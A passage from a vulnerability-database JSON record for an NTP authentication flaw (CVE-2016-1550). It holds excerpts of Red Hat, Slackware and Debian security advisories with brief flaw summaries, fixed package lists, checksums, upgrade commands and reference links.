(NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nSecurity Fix(es):\n\n* It was found that when NTP was configured in broadcast mode, a remote\nattacker could broadcast packets with bad authentication to all clients. \nThe clients, upon receiving the malformed packets, would break the\nassociation with the broadcast server, causing them to become out of sync\nover a longer period of time. (CVE-2015-7979)\n\n* A denial of service flaw was found in the way NTP handled preemptable\nclient associations. A remote attacker could send several crypto NAK\npackets to a victim client, each with a spoofed source address of an\nexisting associated peer, preventing that client from synchronizing its\ntime. (CVE-2016-1547)\n\n* It was found that an ntpd client could be forced to change from basic\nclient/server mode to the interleaved symmetric mode. A remote attacker\ncould use a spoofed packet that, when processed by an ntpd client, would\ncause that client to reject all future legitimate server responses,\neffectively disabling time synchronization on that client. (CVE-2016-1548)\n\n* A flaw was found in the way NTP\u0027s libntp performed message\nauthentication. (CVE-2016-1550)\n\n* An out-of-bounds access flaw was found in the way ntpd processed certain\npackets. An authenticated attacker could use a crafted packet to create a\npeer association with hmode of 7 and larger, which could potentially\n(although highly unlikely) cause ntpd to crash. (CVE-2016-2518)\n\nThe CVE-2016-1548 issue was discovered by Miroslav Lichvar (Red Hat). \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode\n1331461 - CVE-2016-1547 ntp: crypto-NAK preemptable association denial of service\n1331462 - CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets\n1331464 - CVE-2016-1550 ntp: libntp message digest disclosure\n1331468 - CVE-2016-2518 ntp: out-of-bounds references on crafted packet\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nppc64:\nntp-4.2.6p5-10.el6.1.ppc64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm\nntpdate-4.2.6p5-10.el6.1.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-10.el6.1.s390x.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm\nntpdate-4.2.6p5-10.el6.1.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm\nntp-perl-4.2.6p5-10.el6.1.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm\nntp-perl-4.2.6p5-10.el6.1.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nppc64:\nntp-4.2.6p5-22.el7_2.2.ppc64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm\nntpdate-4.2.6p5-22.el7_2.2.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-22.el7_2.2.ppc64le.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm\nntpdate-4.2.6p5-22.el7_2.2.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-22.el7_2.2.s390x.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm\nntpdate-4.2.6p5-22.el7_2.2.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm\nsntp-4.2.6p5-22.el7_2.2.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm\nsntp-4.2.6p5-22.el7_2.2.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm\nsntp-4.2.6p5-22.el7_2.2.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-7979\nhttps://access.redhat.com/security/cve/CVE-2016-1547\nhttps://access.redhat.com/security/cve/CVE-2016-1548\nhttps://access.redhat.com/security/cve/CVE-2016-1550\nhttps://access.redhat.com/security/cve/CVE-2016-2518\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXTUp2XlSAg2UNWIIRAqUmAKC32P98McZUqU1gzWxBbCz0hn0eagCfRtrx\nSULnKXrtTJd5iJ6eQVtDnxA=\n=hETy\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. \n This release patches several low and medium severity security issues:\n CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering\n CVE-2016-1549: Sybil vulnerability: ephemeral association attack,\n AKA: ntp-sybil - MITIGATION ONLY\n CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion\n botch\n CVE-2016-2517: Remote configuration trustedkey/requestkey values are not\n properly validated\n CVE-2016-2518: Crafted addpeer with hmode \u003e 7 causes array wraparound with\n MATCH_ASSOC\n CVE-2016-2519: ctl_getitem() return value not always checked\n CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos\n CVE-2016-1548: Interleave-pivot - MITIGATION ONLY\n CVE-2015-7704: KoD fix: peer associations were broken by the fix for\n NtpBug2901, AKA: Symmetric active/passive mode is broken\n CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks\n CVE-2016-1550: Improve NTP security against buffer comparison timing attacks,\n authdecrypt-timing, AKA: authdecrypt-timing\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ndfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\naa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ndbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz\n\nSlackware x86_64 -current package:\n7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-7977 / CVE-2015-7978\n\n Stephen Gray discovered that a NULL pointer dereference and a\n buffer overflow in the handling of \"ntpdc reslist\" commands may\n result in denial of service. \n\nCVE-2016-2518\n\n Yihan Lian discovered that an OOB memory access could potentially\n crash ntpd. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u2. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p7+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p7+dfsg-1. \n\nWe recommend that you upgrade your ntp packages", "sources": [ { "db": "NVD", "id": "CVE-2016-1550" }, { "db": "CERT/CC", "id": "VU#718152" }, { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "BID", "id": "88261" }, { "db": "VULMON", "id": "CVE-2016-1550" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" } ], "trust": 3.24 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#718152", "trust": 3.6 }, { "db": "NVD", "id": "CVE-2016-1550", "trust": 3.4 }, { "db": "BID", "id": "88261", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "136864", "trust": 1.8 }, { "db": "SECTRACK", "id": "1035705", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-21-103-11", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-21-159-11", "trust": 1.7 }, { "db": "TALOS", "id": "TALOS-2016-0084", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-211752", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-497656", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU95781418", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU96269392", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU91176422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-006651", "trust": 0.8 }, { "db": "CS-HELP", "id": "SB2021061008", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201604-605", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-1550", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138984", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138162", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137244", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138052", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1550" }, { "db": "BID", "id": "88261" }, { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-1550" }, { "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "id": "VAR-201701-1136", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.33987721 }, "last_update_date": "2023-12-18T11:38:15.746000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "TALOS-2016-0084", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "title": "ntpd Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61288" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/04/28/time_for_a_patch_six_vulns_fixed_in_ntp_daemon/" }, { "title": "Red Hat: CVE-2016-1550", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-1550" }, { "title": "Amazon Linux AMI: ALAS-2016-708", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-708" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3096-1" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=e70fe4cd19746222a97e5da53d3d2b2a" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=85311fa037162a48cd67fd63f52a6478" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-1550" }, { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.0 }, { "problemtype": "information leak (CWE-200) [NVD Evaluation ]", "trust": 0.8 }, { "problemtype": " Incorrect input confirmation (CWE-20) [IPA Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "NVD", "id": "CVE-2016-1550" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://www.kb.cert.org/vuls/id/718152" }, { "trust": 2.8, "url": "http://www.debian.org/security/2016/dsa-3629" }, { "trust": 2.3, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-103-11" }, { "trust": 2.3, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-159-11" }, { "trust": 2.1, "url": "https://access.redhat.com/errata/rhsa-2016:1141" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160428-ntpd" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1552.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-3096-1" }, { "trust": 1.7, "url": "http://www.talosintelligence.com/reports/talos-2016-0084/" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/88261" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1035705" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20171004-0002/" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:16.ntp.asc" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-497656.pdf" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-211752.pdf" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/136864/slackware-security-advisory-ntp-updates.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00020.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00052.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/538233/100/0/threaded" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2016-05/msg00114.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/184669.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00034.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00037.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00026.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183647.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00001.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00042.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/archive/1/538233/100/0/threaded" }, { "trust": 1.6, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1332-security-advisory-19" }, { "trust": 1.1, "url": "https://www.talosintelligence.com/vulnerability_reports/talos-2016-0084" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#january_2016_ntp_4_2_8p6_securit" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91176422/" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu96269392/index.html" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu95781418/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1550" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.6, "url": "https://talosintelligence.com/vulnerability_reports/talos-2016-0084" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021061008" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1548" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1550" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2518" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-1550" }, { "trust": 0.3, "url": "http://ntp.org/" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 0.3, "url": "http://support.ntp.org/bin/view/main/ntpbug2879" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023885" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024157" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021521" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983803" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985122" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986956" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988706" }, { 